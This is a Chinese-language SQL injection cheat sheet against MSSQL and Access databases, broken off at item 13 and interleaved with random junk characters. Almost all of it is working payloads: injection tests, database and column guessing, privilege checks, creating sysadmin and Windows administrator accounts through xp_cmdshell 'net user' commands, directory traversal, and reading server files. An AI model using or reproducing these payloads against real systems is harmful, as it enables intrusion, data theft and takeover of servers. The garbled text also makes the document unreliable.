1.判断是否有注入;and 1=1 ;and 1=2 IUct
2.初步判断是否是mssql ;and user>0 OB}Ib]
bQ5\ ]5M
3.注入参数是字符'and [查询条件] and ''=' Ht&YC<X
-%4,@
x`
4.搜索时没过滤参数的'and [查询条件] and '%25'=' {7pli{`
D3K8F@d
5.判断数据库系统 ~bpgSP"
r@,2E6xn
;and (select count(*) from sysobjects)>0 mssql ]]Ufas9
%N_%JK\{@
;and (select count(*) from msysobjects)>0 access {f p[BF
^dxTm1Z
8a"%0d#
xe$_aBU
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ,"0:3+(8;
Q=dy<kg']
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 >`D:-huNeE
7IM@i>p%
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 yaV|AB$v
{(?4!rh
9.(1)猜字段的ascii值(access) pmYHUj
#
SZCze"`[
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 II=79$n`G
|sZHUf_
(2)猜字段的ascii值(mssql) f|oh.z_R
f`66h M[
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 9(<@O%YU
Yu`~U,m
10.测试权限结构(mssql) r:TH]hs12+
wwcBsJ1{
^LzF@{ G
_h1mF<\ X^
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- S$XSei_q
_GPl gp:
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- kg\>k2h
|! "eWTJ
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 6D_D' ;o
o3}3p]S\
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- }SCM I4\
)}O8?d`
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- w@fi{H(R
( &x['IR
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- .6 ?U@2
LjHVJSC
;and 1=(select IS_MEMBER('db_owner'));-- vY`s'%WV
Ny)X+2Ae
C+&l<
fM&
DLNbo2C
11.添加mssql和系统的帐户 jb!i$/%w
ZqO^f*F>h
;exec master.dbo.sp_addlogin username;-- 18:%~>.!
;exec master.dbo.sp_password null,username,password;-- 0+b1vhQ
FHI ;)wn=
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ENY+^7
.(2ik5A%9
;exec master.dbo.xp_cmdshell 'net user username password 3"\l u?-E
Pj%|\kbNs
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- %D "I
'H <\x
;exec master.dbo.xp_cmdshell 'net user username password /add';-- Pg7Yp2)Oli
x]ot 2
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- &b& ,
E8&TO~"a]e
y4fdq7i~}9
9=2$8JN=(l
12.(1)遍历目录 0_t!T'jr7
b>JDH1)
;create table dirs(paths varchar(100), id int) qJUK_6|3
y:l\$pGC%
;insert dirs exec master.dbo.xp_dirtree 'c:\' {.mngRQF
$ L]lHji
;and (select top 1 paths from dirs)>0 K@hw.Xq"
~W]TD@w
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) +=8VTCn?
l1Fc>:o{
M\Kx'N
z2>lI9D4V
(2)遍历目录 iOO)Q\
hY8reQp1
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- VyGJ=[ ]
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 N ZSSg2TX#
UFuX@Lu0
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 $iz|\m
x-3\Ls[I
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 !%0 *z
o{[YA}xc
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 P7~ >mm+
:9 ^*
^T
kMd.h[X~
Q]>.b%s[
13.mssql中的存储过程 1&Z